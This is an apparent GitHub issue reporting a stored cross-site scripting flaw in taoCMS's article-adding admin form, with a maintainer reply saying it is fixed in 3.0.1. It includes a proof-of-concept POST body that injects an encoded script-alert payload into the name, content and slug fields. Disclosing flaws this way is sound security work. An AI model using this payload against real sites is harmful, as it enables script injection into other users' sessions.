There is a storage type cross site scripting attack at "Management column"(Column administrator authority)

taogogo / taocms

taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)

MIT License

60 stars 21 forks source link

There is a storage type cross site scripting attack at "Management column"(Column administrator authority) #3

Closed ddddbhm closed 3 years ago

ddddbhm commented 3 years ago

First, we enter the background and use the column administrator admin1 we created:

Let's click "add article" on the left:

http://target/admin/admin.php?action=frame&ctrl=iframes

Wow!

POC:

/admin/admin.php postData:name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic=&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4

taogogo commented 3 years ago

3.0.1 fixed, thanks for your contribution